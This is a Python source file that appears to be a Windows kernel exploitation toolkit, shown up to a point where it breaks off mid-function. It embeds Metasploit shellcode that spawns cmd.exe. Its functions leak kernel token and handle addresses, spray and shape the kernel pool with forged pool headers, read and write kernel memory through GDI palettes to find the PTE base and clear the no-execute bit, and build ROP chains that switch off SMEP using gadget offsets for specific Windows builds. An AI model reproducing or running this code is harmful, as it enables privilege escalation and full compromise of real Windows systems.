kex.py

import sys
import os
import struct
import platform
import signal
from subprocess import check_output
from ctypes import *
from ctypes.wintypes import *

#########################################################################################
#######################################Shellcodes########################################
#########################################################################################


# /*
#  * windows/x64/exec - 275 bytes
#  * http://www.metasploit.com
#  * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
#  * CMD=cmd.exe
#  */
SHELLCODE_EXEC_CMD_X64 = (
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
"\x2e\x65\x78\x65\x00")

#########################################################################################
######################################Common structs#####################################
#########################################################################################

ULONG_PTR = PVOID = LPVOID = PVOID64 = c_void_p
PROCESSINFOCLASS = DWORD
ULONG = c_uint32
PULONG = POINTER(ULONG)
NTSTATUS = DWORD
HPALETTE = HANDLE
QWORD = c_ulonglong
CHAR = c_char
KAFFINITY = ULONG_PTR
SDWORD = c_int32


#to be filled properly
class PEB(Structure):
	_fields_ = [
		("Stuff", c_byte * 0xF8),
		("GdiSharedHandleTable", PVOID)
	]

#source: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684280(v=vs.85).aspx
class PROCESS_BASIC_INFORMATION(Structure):
	_fields_ = [
		("Reserved1", PVOID),
		("PebBaseAddress", POINTER(PEB)),
		("Reserved2", PVOID * 2),
		("UniqueProcessId", ULONG_PTR),
		("Reserved3", PVOID)
	]

#source: https://www.ekoparty.org/archivo/2015/eko11-Abusing_GDI.pdf
class GDICELL64(Structure):
	_fields_ = [
		("pKernelAddress", PVOID64),
		("wProcessId", USHORT), 
		("wCount", USHORT),
		("wUpper", USHORT),
		("wType", USHORT),
		("pUserAddress", PVOID64)
	]

#source: https://msdn.microsoft.com/en-us/library/windows/desktop/ms646340(v=vs.85).aspx
class ACCEL(Structure):
	_fields_ = [
		("fVirt", BYTE),
		("key", WORD), 
		("cmd", WORD)
	]

class ACCEL_ARRAY(Structure):
	_fields_ = [
		("ACCEL_ARRAY", POINTER(ACCEL) * 675)
	]
	
WNDPROCTYPE = WINFUNCTYPE(c_int, HWND, c_uint, WPARAM, LPARAM)
#WNDPROC  = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM)

#Windows 10x64 v1703
class WNDCLASSEX(Structure):
	_fields_ = [
		("cbSize", c_uint),
		("style", c_uint),
		("lpfnWndProc", WNDPROCTYPE),
		("cbClsExtra", c_int),
		("cbWndExtra", c_int),
		("hInstance", HANDLE),
		("hIcon", HANDLE),
		("hCursor", HANDLE),
		("hBrush", HANDLE),
		("lpszMenuName", LPCWSTR),
		("lpszClassName", LPCWSTR),
		("hIconSm", HANDLE)
	]

class PALETTEENTRY(Structure):
	_fields_ = [
		("peRed", BYTE),
		("peGreen", BYTE),
		("peBlue", BYTE),
		("peFlags", BYTE)
	]

class LOGPALETTE(Structure):
	_fields_ = [
		("palVersion", WORD),
		("palNumEntries", WORD),
		("palPalEntry", POINTER(PALETTEENTRY))
	]

class LSA_UNICODE_STRING(Structure):
	"""Represent the LSA_UNICODE_STRING on ntdll."""
	_fields_ = [
		("Length", USHORT),
		("MaximumLength", USHORT),
		("Buffer", LPWSTR)
	]

class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
	_fields_ = [
		("Name", LSA_UNICODE_STRING),
		("Reserved", ULONG * 22)
	]
	
class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
	"""Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
	_fields_ = [
		("Object", PVOID),
		("UniqueProcessId", PVOID),
		("HandleValue", PVOID),
		("GrantedAccess", ULONG),
		("CreatorBackTraceIndex", USHORT),
		("ObjectTypeIndex", USHORT),
		("HandleAttributes", ULONG),
		("Reserved", ULONG),
	]
 
class SYSTEM_HANDLE_INFORMATION_EX(Structure):
	"""Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
	_fields_ = [
		("NumberOfHandles", PVOID),
		("Reserved", PVOID),
		("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
	]

class PROCESSENTRY32(Structure):
	"""Describes an entry from a list of the processes residing in the system
	   address space when a snapshot was taken."""
	_fields_ = [ ( 'dwSize' , DWORD ) ,
				 ( 'cntUsage' , DWORD) ,
				 ( 'th32ProcessID' , DWORD) ,
				 ( 'th32DefaultHeapID' , POINTER(ULONG)) ,
				 ( 'th32ModuleID' , DWORD) ,
				 ( 'cntThreads' , DWORD) ,
				 ( 'th32ParentProcessID' , DWORD) ,
				 ( 'pcPriClassBase' , LONG) ,
				 ( 'dwFlags' , DWORD) ,
				 ( 'szExeFile' , CHAR * MAX_PATH ) 
	] 

class CLIENT_ID(Structure):
	_fields_ = [
		("UniqueProcess",   PVOID),
		("UniqueThread",	PVOID),
]

class THREAD_BASIC_INFORMATION(Structure):
	_fields_ = [
		("ExitStatus",	  NTSTATUS),
		("TebBaseAddress",  PVOID),	 # PTEB
		("ClientId",		CLIENT_ID),
		("AffinityMask",	KAFFINITY),
		("Priority",		SDWORD),
		("BasePriority",	SDWORD),
	]

#########################################################################################
###################################Function definitions##################################
#########################################################################################

Psapi	= windll.Psapi
kernel32 = windll.kernel32
ntdll = windll.ntdll
gdi32 = windll.gdi32
shell32 = windll.shell32
user32 = windll.user32
advapi32 = windll.advapi32

gdi32.CreatePalette.argtypes = [LPVOID]
gdi32.CreatePalette.restype = HPALETTE

gdi32.GetPaletteEntries.argtypes = [HPALETTE, UINT, UINT, LPVOID]
gdi32.GetPaletteEntries.restype = UINT

gdi32.SetPaletteEntries.argtypes = [HPALETTE, UINT, UINT, LPVOID]
gdi32.SetPaletteEntries.restype = UINT

gdi32.SetBitmapBits.argtypes = [HBITMAP, DWORD, LPVOID]
gdi32.SetBitmapBits.restype = LONG

gdi32.GetBitmapBits.argtypes = [HBITMAP, LONG, LPVOID]
gdi32.GetBitmapBits.restype = LONG

gdi32.CreateBitmap.argtypes = [c_int, c_int, UINT, UINT, c_void_p]
gdi32.CreateBitmap.restype = HBITMAP

ntdll.NtQueryInformationProcess.argtypes = [HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG]
ntdll.NtQueryInformationProcess.restype = NTSTATUS

ntdll.NtQueryObject.argtypes = [HANDLE, DWORD, POINTER(PUBLIC_OBJECT_TYPE_INFORMATION), ULONG, POINTER(ULONG)]
ntdll.NtQueryObject.restype = NTSTATUS

ntdll.NtQuerySystemInformation.argtypes = [DWORD, POINTER(SYSTEM_HANDLE_INFORMATION_EX), ULONG, POINTER(ULONG)]
ntdll.NtQuerySystemInformation.restype = NTSTATUS

kernel32.GetProcAddress.restype = c_ulonglong
kernel32.GetProcAddress.argtypes = [HMODULE, LPCSTR]

kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD]
kernel32.OpenProcess.restype = HANDLE

kernel32.GetCurrentProcess.restype = HANDLE												

kernel32.WriteProcessMemory.argtypes = [HANDLE, LPVOID, LPCSTR, DWORD, POINTER(LPVOID)]
kernel32.WriteProcessMemory.restype = BOOL						   

kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD, DWORD]
kernel32.VirtualAllocEx.restype = LPVOID

kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD, LPVOID, DWORD, POINTER(HANDLE)]
kernel32.CreateRemoteThread.restype = BOOL

kernel32.GetCurrentThread.argtypes = []
kernel32.GetCurrentThread.restype = HANDLE

advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)]
advapi32.OpenProcessToken.restype = BOOL

kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD]
kernel32.CreateToolhelp32Snapshot.restype = HANDLE

kernel32.DeviceIoControl.argtypes = [HANDLE, DWORD, c_void_p, DWORD, c_void_p, DWORD, c_void_p, c_void_p]
kernel32.DeviceIoControl.restype = BOOL

ntdll.NtQueryInformationThread.argtypes = [HANDLE, DWORD, POINTER(THREAD_BASIC_INFORMATION), ULONG, POINTER(ULONG)]
ntdll.NtQueryInformationThread.restype = NTSTATUS

#########################################################################################
######################################Common constants###################################
#########################################################################################

# THREAD_INFORMATION_CLASS
ThreadBasicInformation = 0

# PROCESS_INFORMATION_CLASS
ProcessBasicInformation = 0 #Retrieves a pointer to a PEB structure that can be used to determine whether the specified process is being debugged, and a unique value used by the system to identify the specified process. It is best to use the CheckRemoteDebuggerPresent and GetProcessId functions to obtain this information.
ProcessDebugPort = 7 #Retrieves a DWORD_PTR value that is the port number of the debugger for the process. A nonzero value indicates that the process is being run under the control of a ring 3 debugger. It is best to use the CheckRemoteDebuggerPresent or IsDebuggerPresent function.
ProcessWow64Information = 26 #Determines whether the process is running in the WOW64 environment (WOW64 is the x86 emulator that allows Win32-based applications to run on 64-bit Windows). It is best to use the IsWow64Process function to obtain this information.
ProcessImageFileName = 27 # Retrieves a UNICODE_STRING value containing the name of the image file for the process. It is best to use the QueryFullProcessImageName or GetProcessImageFileName function to obtain this information.
ProcessBreakOnTermination = 29 #Retrieves a ULONG value indicating whether the process is considered critical. Note  This value can be used starting in Windows XP with SP3. Starting in Windows 8.1, IsProcessCritical should be used instead.
ProcessSubsystemInformation = 75#Retrieves a SUBSYSTEM_INFORMATION_TYPE value indicating the subsystem type of the process. The buffer pointed to by the ProcessInformation parameter should be large enough to hold a single SUBSYSTEM_INFORMATION_TYPE enumeration.

ObjectBasicInformation = 0
ObjectTypeInformation = 2

SystemExtendedHandleInformation = 64

VER_NT_WORKSTATION 			= 1 # The system is a workstation.
VER_NT_DOMAIN_CONTROLLER	= 2	# The system is a domain controller.
VER_NT_SERVER				= 3	# The system is a server, but not a domain controller.

GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
VIRTUAL_MEM  = ( 0x1000 | 0x2000 )

STATUS_SUCCESS = 0
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_BUFFER_OVERFLOW = 0x80000005L
STATUS_INVALID_HANDLE = 0xC0000008L
STATUS_BUFFER_TOO_SMALL = 0xC0000023L 

PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
TOKEN_ALL_ACCESS = 0xf00ff

FILE_DEVICE_UNKNOWN = 0x00000022

METHOD_BUFFERED		= 0x0
METHOD_IN_DIRECT	= 0x1
METHOD_OUT_DIRECT	= 0x2
METHOD_NEITHER		= 0x3

FILE_READ_DATA		= 0x1
FILE_WRITE_DATA 	= 0x2
FILE_ANY_ACCESS		= 0x0

FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
NULL = 0x0

INVALID_HANDLE_VALUE = -1

TH32CS_SNAPPROCESS = 0x02

class x_file_handles(Exception):
	pass

#########################################################################################
###################This section contains sysinfo related functions#######################
#########################################################################################

def get_kuser_shared_data():
	"""
	This function returns the static address of KUSER_SHARED_DATA
	@return: address of KUSER_SHARED_DATA
	"""
	if platform.architecture()[0] == '64bit':
		return 0xFFFFF78000000000
	elif platform.architecture()[0] == '32bit':
		return 0x7FFE0000

#source: https://github.com/tjguk/winsys/blob/master/random/file_handles.py
def signed_to_unsigned(signed):
	"""
	Convert signed to unsigned
	@param signed: the value to be converted
	"""
	unsigned = struct.unpack("L", struct.pack("l", signed))
	return unsigned

#source: https://github.com/tjguk/winsys/blob/master/random/file_handles.py + https://www.exploit-db.com/exploits/34272/
def get_type_info(handle):
	"""
	Get the handle type information.
	@param handle: handle of the object
	"""
	public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
	size = DWORD(sizeof(public_object_type_information))
	while True:
		result = ntdll.NtQueryObject(handle, ObjectTypeInformation, byref(public_object_type_information), size, None)
		if result == STATUS_SUCCESS:
			return public_object_type_information.Name.Buffer
		elif result == STATUS_INFO_LENGTH_MISMATCH:
			size = DWORD(size.value * 4)
			resize(public_object_type_information, size.value)
		elif result == STATUS_INVALID_HANDLE:
			print "[-] INVALID HANDLE: %s, exiting..." % hex(handle)
			sys.exit(-1)
		else:
			raise x_file_handles("NtQueryObject", hex(result))

#source: https://github.com/tjguk/winsys/blob/master/random/file_handles.py + https://www.exploit-db.com/exploits/34272/
def get_handles():
	""" Return all the open handles in the system """
	system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
	size = DWORD (sizeof(system_handle_information))
	while True:
		result = ntdll.NtQuerySystemInformation(
			SystemExtendedHandleInformation,
			byref(system_handle_information),
			size,
			byref(size)
		)
		if result == STATUS_SUCCESS:
			break
		elif result == STATUS_INFO_LENGTH_MISMATCH:
			size = DWORD(size.value * 4)
			resize(system_handle_information, size.value)
		else:
			raise x_file_handles("NtQuerySystemInformation", hex(result))

	pHandles = cast(
		system_handle_information.Handles,
		POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
				system_handle_information.NumberOfHandles)
	)
	for handle in pHandles.contents:
		yield handle.UniqueProcessId, handle.HandleValue, handle.Object

def token_address_of_process(h_process, process_id):
	"""
	Function to get the address of the token belonging to a process
	@param h_process: handle to the process
	@param process_id: PID of the same process
	@return: address of the token
	"""
	token_handle = HANDLE()
	if not advapi32.OpenProcessToken(h_process,TOKEN_ALL_ACCESS, byref(token_handle)):
		print "[-] Could not open process token of process %s, exiting..." % pid
		sys.exit()

	print "[*] Leaking token addresses from kernel space..."
	for pid, handle, obj in get_handles():
		if pid == process_id and get_type_info(handle) == "Token":
			if token_handle.value == handle:
				print "[+] PID: %s token address: %x" % (str(process_id), obj)
				return obj

def get_teb_base():
	"""
	Function to get the TEB base address
	@return: teb base address
	"""
	print "[*] Getting TEB base address"
	h_thread = kernel32.GetCurrentThread()
	tbi = THREAD_BASIC_INFORMATION()
	len = c_ulonglong()
	result = ntdll.NtQueryInformationThread(h_thread, ThreadBasicInformation, byref(tbi), sizeof(tbi), None)
	if result == STATUS_SUCCESS:
		teb_base = tbi.TebBaseAddress
		print "[+] TEB base address: %s" % hex(teb_base)
		return teb_base
	else:
		print "[-] Something wen wrong, exiting..."
		sys.exit(-1)

def kernel_address_of_handle(h, process_id):
	"""
	Function to get the address of the handle
	@param h: handle to the object
	@param process_id: PID of the process
	@return: address of the handle
	"""
	print "[*] Leaking handle addresses from kernel space..."
	for pid, handle, obj in get_handles():
		#print hex(handle)
		if pid == process_id and handle == h:
			print "[+] PID: %s handle %s address: %x" % (str(process_id), handle, obj)
			return obj

def getpid(procname):
	"""
	Get Process Pid by procname
	@param procname: the name of the process to find
	@return: PID
	"""
	pid = None
	try:
		hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
		pe32 = PROCESSENTRY32()
		pe32.dwSize = sizeof(PROCESSENTRY32)
		ret = kernel32.Process32First(hProcessSnap , byref(pe32))
		while ret:
			if pe32.szExeFile == LPSTR(procname).value:
				pid = pe32.th32ProcessID
			ret = kernel32.Process32Next(hProcessSnap, byref(pe32))
		kernel32.CloseHandle ( hProcessSnap )
	except Exception, e:
		print "[-] Error: %s" % str(e)
	if not pid:
		print "[-] Could not find %s PID" % procname
		sys.exit()
	return pid

#########################################################################################
###############This section contains kernel pool spraying related functions##############
#########################################################################################


kernel_object_sizes = {}

#sizes of various kernel objects
kernel_object_sizes['unnamed_mutex'] = 0x50
kernel_object_sizes['unnamed_job'] = 0x168
kernel_object_sizes['iocompletionreserve'] = 0x60
kernel_object_sizes['unnamed_semaphore'] = 0x48
kernel_object_sizes['event'] = 0x40

pool_object_handles = []

#the first 0x28 bytes in the pool allocation, which will allow an overwrite
#the previous size and and the TypeIndex is set zero
pool_object_headers = {}
pool_object_headers['unnamed_mutex'] = [0x040a0000,0xe174754d,0x00000000,0x00000050,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x00080000]
pool_object_headers['unnamed_job'] = [0x042d0000,0xa0626f4a,0x00000000,0x00000168,0x0000006c,0x86e0bd80,0x00000001,0x00000001,0x00000000,0x00080000]
pool_object_headers['iocompletionreserve'] = [0x040c0000,0xef436f49,0x00000000,0x0000005c,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x00080000]
pool_object_headers['unnamed_semaphore'] = [0x04090000,0xe16d6553,0x00000000,0x00000044,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x00080000]
pool_object_headers['event'] = [0x04080000,0xee657645,0x00000000,0x00000040,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x00080000]

"""
#The original typeindex (in case I need it later)
original_typeindex = {}
original_typeindex['unnamed_mutex'] = 0xe
original_typeindex['unnamed_job'] = 0x6
original_typeindex['iocompletionreserve'] = 0xa
original_typeindex['unnamed_semaphore'] = 0x10
original_typeindex['event'] = 0xc
"""

SPRAY_COUNT = 50000

def allocate_object(object_to_use, variance):
	"""
	Allocate an object based on the input
	@param object_to_use: name of the object to allocate
	@param variance: extra string to use (typically a number) for named objects
	@return: the handle to the object
	"""
	hHandle = HANDLE(0)
	if object_to_use == 'unnamed_mutex':
		hHandle = kernel32.CreateMutexA(None, False, None)
	elif object_to_use == 'named_mutex':
		hHandle = kernel32.CreateMutexA(None, False, "Pool spraying is cool %s" % variance)
	elif object_to_use == 'unnamed_job':
		hHandle = kernel32.CreateJobObjectA(None, None)
	elif object_to_use == 'named_job':
		hHandle = kernel32.CreateJobObjectA(None, "Job %s" % variance)
	elif object_to_use == 'iocompletionport':
		hHandle = kernel32.CreateIoCompletionPort(-1, None, 0, 0)
	elif object_to_use == 'iocompletionreserve':
		IO_COMPLETION_OBJECT = 1
		ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)
		hHandle = hHandle.value
	elif object_to_use == 'unnamed_semaphore':
		hHandle = kernel32.CreateSemaphoreA(None, 0, 3, None)
	elif object_to_use == 'named_semaphore':
		hHandle = kernel32.CreateSemaphoreA(None, 0, 3, "My little Semaphore %s" % variance)
	elif object_to_use == 'event':
		hHandle = kernel32.CreateEventA(None, False, False, None)
	if hHandle == None:
		print "[-] Error while creating object: %s" % object_to_use
		sys.exit(-1)
	return hHandle

def find_object_to_spray(required_hole_size):
	"""
	Calculates which object to use for kernel pool spraying
	@param required_hole_size: the required hole size in kernel pool, which will be overflown
	@return: the object to use for creating the hole size
	"""
	for key in kernel_object_sizes:
		if required_hole_size % kernel_object_sizes[key] == 0:
			print "[+] Found a good object to spray with: %s" % key
			return key
	print "[-] Couldn't find proper object to spray with"
	sys.exit()

def spray(required_hole_size):
	"""
	Spray the heap with objects which will allow us to create the required holes later
	@param required_hole_size: : the required hole size in kernel pool, which will be overflown
	@return: object type (name) to use for overflow
	"""
	global pool_object_handles
	good_object = find_object_to_spray(required_hole_size)
	for i in range(SPRAY_COUNT):
		pool_object_handles.append(allocate_object(good_object, i))
	print "[+] Spray done!"
	return good_object

def make_hole(required_hole_size, good_object):
	"""
	Making holes in the sprayd kernel
	@param required_hole_size: the required hole size in kernel pool, which will be overflown
	@param good_object: object type (name) to use for overflow
	"""
	global pool_object_handles
	nr_to_free = required_hole_size / kernel_object_sizes[good_object]
	for i in range(0, SPRAY_COUNT,16):
		for j in range(0,nr_to_free):
			kernel32.CloseHandle(pool_object_handles[i + j])
			pool_object_handles[i + j] = None
	print "[+] Making holes done!"

def gimme_the_hole(required_hole_size):
	"""
	Spray and make holes
	@param required_hole_size: the required hole size in kernel pool, which will be overflown
	"""
	good_object = spray(required_hole_size)
	make_hole(required_hole_size, good_object)
	return good_object

def close_all_handles():
	"""
	Close all handles, which were used for kernel pool spraying
	"""
	print "[+] Triggering shellcode!"
	global pool_object_handles
	for i in range(0, SPRAY_COUNT):
		if (pool_object_handles[i] != None):
			kernel32.CloseHandle(pool_object_handles[i])
			pool_object_handles[i] = None
	print "[+] Free pool allocations done!"

def calculate_previous_size(required_hole_size):
	"""
	Calculate the previous size value for the pool header
	The PreviousSize value * 8 = previous chunk
	@param required_hole_size: the required hole size in kernel pool, which will be overflown
	@return: the previous_size value to be used on the POOL_HEADER
	"""
	if platform.architecture()[0] == '64bit':
		return required_hole_size/16
	elif platform.architecture()[0] == '32bit':
		return required_hole_size/8
	else:
		print "[-] Couldn't determine the Windows architecture, exiting..."
		sys.exit(-1)

def pool_overwrite(required_hole_size,good_object):
	"""
	This function will give us the data (POOL_HEADER + part of OBJECT_HEADER) to be used for the pool overwrite
	@param required_hole_size: the required hole size in kernel pool, which will be overflown
	@param good_object: object type (name) to use for overflow
	"""
	header = ''
	for i in range(len(pool_object_headers[good_object])):
		if i == 0:
			#for the first entry we need to calculate the previous pool size value, as it's required
			header += struct.pack("L",pool_object_headers[good_object][0] + calculate_previous_size(required_hole_size))
		else:
			header += struct.pack("L",pool_object_headers[good_object][i])
	return header

#########################################################################################
######################This section contains PTE related functions########################
#########################################################################################

def get_pxe_address_x64(virtual_address, pte_base):
	"""
	The functions gives the PTE address for a virtual address
	Based on: https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
	@param virtual_address: the virtual address to convert
	@param pte_base: the base address for PTE
	"""
	pte_address = virtual_address >> 9
	pte_address = pte_address | pte_base
	pte_address = pte_address & (pte_base + 0x0000007ffffffff8)
	return pte_address

def get_pxe_address_x32(virtual_address, pte_base):
	"""
	The functions gives the PTE address for a virtual address
	@param virtual_address: the virtual address to convert
	@param pte_base: the base address for PTE
	"""
	pte_address = virtual_address >> 9
	pte_address = pte_address | pte_base
	pte_address = pte_address & (pte_base + 0x007FFFF8)
	return pte_address

def get_pte_base_old_x64():
	""" Returns the PTE base address for older version of Windows (prior 1607 / Redstone 1 / Anniversary Update) """
	return 0xFFFFF68000000000

def get_pte_base_old_x32():
	""" Returns the PTE base address for older version of Windows (prior 1607 / Redstone 1 / Anniversary Update) """
	return 0xC0000000

def leak_pte_base_palette(manager_palette, worker_palette):
	"""
	Based on:
	https://github.com/FuzzySecurity/PSKernel-Primitives/blob/master/Pointer-Leak.ps1
	and
	https://www.blackhat.com/docs/us-17/wednesday/us-17-Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level%E2%80%93Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update-wp.pdf
	Function to leak the PTE base from the nt!MiGetPteAddress function
	@param manager_platte: handle to the manager palette
	@param worker_platte: handle to the worker palette
	@return: PTE base
	"""
	print "[*] Locating PTE base..."
	#get the MmFreeNonCachedMemory address
 	if platform.architecture()[0] == '64bit':
		kernel32.LoadLibraryExA.restype = c_uint64
		kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
		kernel32.GetProcAddress.restype = c_uint64
	#(krnlbase, kernelver) = find_driver_base()
	krnlbase = leak_nt_base_palette(manager_palette, worker_palette)
	kernelver = ['ntoskrnl.exe','ntkrnlmp.exe','ntkrnlpa.exe','ntkrpamp.exe']
	for k in kernelver:
		print "[+] Loading %s in userland" % k
		hKernel = kernel32.LoadLibraryExA(k, 0, 1)
		if hKernel != 0:
			print "[+] %s base address : %s" % (k, hex(hKernel))
			break
	if hKernel == 0:
		print "[-] Couldn't load kernel, exiting..."
		sys.exit(-1)
	MmFreeNonCachedMemory = kernel32.GetProcAddress(hKernel, 'MmFreeNonCachedMemory')
	MmFreeNonCachedMemory -= hKernel
	MmFreeNonCachedMemory += krnlbase
	print "[+] MmFreeNonCachedMemory address: %s" % hex(MmFreeNonCachedMemory)
	#use palettes to find the MiGetPteAddress by searching the CALL function in MmFreeNonCachedMemory
	#e.g.: fffff802`3c6ba4d7 e8fc059bff	  call	nt!MiGetPteAddress (fffff802`3c06aad8)
	MmFreeNonCachedMemory_data = create_string_buffer(0x100)
	read_memory_palette(manager_palette, worker_palette, MmFreeNonCachedMemory, byref(MmFreeNonCachedMemory_data), sizeof(MmFreeNonCachedMemory_data))
	#loop through the function data and search for the first call (e8)
	for i in range(sizeof(MmFreeNonCachedMemory_data)):
		if MmFreeNonCachedMemory_data.raw[i] == '\xe8':
			offset = 0x100000000 - struct.unpack("L",MmFreeNonCachedMemory_data.raw[i+1:i+5])[0]
			MiGetPteAddress_address = MmFreeNonCachedMemory - offset + 5 + i
			print "[+] MiGetPteAddress address: %s" % hex(MiGetPteAddress_address)
			break
	"""
	nt!MiGetPteAddress:
	fffff802`3c06aad8 48c1e909		shr	 rcx,9
	fffff802`3c06aadc 48b8f8ffffff7f000000 mov rax,7FFFFFFFF8h
	fffff802`3c06aae6 4823c8		  and	 rcx,rax
	fffff802`3c06aae9 48b80000000000baffff mov rax,0FFFFBA0000000000h
	"""
	pte_base = c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, MiGetPteAddress_address + 0x13, byref(pte_base), sizeof(pte_base))
	print "[+] PTE base: %s" % hex(pte_base.value)
	return pte_base.value


def make_memory_executable_palette(manager_palette, worker_palette, virtual_address):
	"""
	Function to change an address to executable with palettes
	based on: https://www.blackhat.com/docs/us-17/wednesday/us-17-Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level%E2%80%93Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update-wp.pdf
	@param manager_platte: handle to the manager palette
	@param worker_platte: handle to the worker palette
	"""
	pte_base = leak_pte_base_palette(manager_palette, worker_palette)
	pte_address = get_pxe_address_x64(virtual_address, pte_base)
	current_pte_value = c_ulonglong()
	read_memory_palette(manager_palette, worker_palette, pte_address, byref(current_pte_value), sizeof(current_pte_value))
	tobe_pte_value = c_ulonglong(current_pte_value.value & 0x0fffffffffffffff)
	write_memory_palette(manager_palette, worker_palette, pte_address, byref(tobe_pte_value), sizeof(tobe_pte_value));

#########################################################################################
#################This section contains SMEP bypass related functions#####################
#########################################################################################

def get_smep_rop1_offsets():
	"""
	This function returns offsets to support the ROP chain which change the value in CR4
	@return: offsets
	"""
	p = platform.platform()
	if p == 'Windows-10-10.0.16299':
		pop_rcx_ret = 0x160580
		mov_cr4_rcx_ret = 0x41f901
	elif p == 'Windows-8.1-6.3.9600':
		pop_rcx_ret = 0x20b29
		mov_cr4_rcx_ret = 0x8655a
	else:
		print "[-] Offsets are not currently available for this platform, exiting..."
		sys.exit(-1)
	return (pop_rcx_ret, mov_cr4_rcx_ret)

def get_smep_rop2_offsets():
	"""
	This function returns offsets to support the ROP chain which sets a user mode page to be in kernel (supervisory)
	@return: offsets
	"""
	p = platform.platform()
	if p == 'Windows-10-10.0.16299':
		pop_rcx_ret = 0x23ed				#s hal L7f000 59 c3
		pop_rax_ret = 0xbb9e				#s hal L7f000 58 c3
		mov_byte_ptr_rax_cl_ret = 0x9820	#s hal L7f000 88 08
		wbinvd_ret = 0x415f0				#s hal L7f000 0f 09 c3
	else:
		print "[-] Offsets are not currently available for this platform, exiting..."
		sys.exit(-1)
	return (pop_rcx_ret, pop_rax_ret, mov_byte_ptr_rax_cl_ret, wbinvd_ret)

def disable_smep_cr4_rop(kernel_base, return_address):
	"""
	This function creates a ROP chain to disable SMEP in the CR4 register
	@param kernel_base: base address of the kernel
	@param return_address: address to return to after the ROP chain completes
	@return: ROP chain
	"""
	(pop_rcx_ret, mov_cr4_rcx_ret) = get_smep_rop1_offsets()
	rop =  struct.pack("<Q", kernel_base+pop_rcx_ret)		# pop rcx ; ret
	rop += struct.pack("<Q", 0x506f8)					# (popped into rcx)
	rop += struct.pack("<Q", kernel_base+mov_cr4_rcx_ret)		# mov cr4, rcx ; ret
	if return_address != None:
		rop += struct.pack("<Q", return_address)			# (return into shellcode)
	return rop

def enable_smep_cr4_rop(kernel_base, return_address):
	"""
	This function creates a ROP chain to enable SMEP in the CR4 register
	@param kernel_base: base address of the kernel
	@param return_address: address to return to after the ROP chain completes
	@return: ROP chain
	"""
	(pop_rcx_ret, mov_cr4_rcx_ret) = get_smep_rop1_offsets()
	rop =  struct.pack("<Q", kernel_base+pop_rcx_ret)		# pop rcx ; ret
	rop += struct.pack("<Q", 0x1506f8)					# (popped into rcx)
	rop += struct.pack("<Q", kernel_base+mov_cr4_rcx_ret)		# mov cr4, rcx ; ret
	if return_address != None:
